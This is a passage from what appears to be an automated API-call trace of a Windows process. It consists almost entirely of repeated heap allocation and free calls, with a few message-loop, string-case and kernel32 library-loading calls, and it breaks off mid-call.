hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0176.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0176.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0176.165] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0176.165] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0176.167] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0176.167] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.167] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0176.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0176.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0176.167] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0176.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0176.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0176.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0176.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0176.168] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0176.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0176.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0176.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0176.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0176.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0176.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0176.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0176.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0176.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0176.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.172] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.175] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, 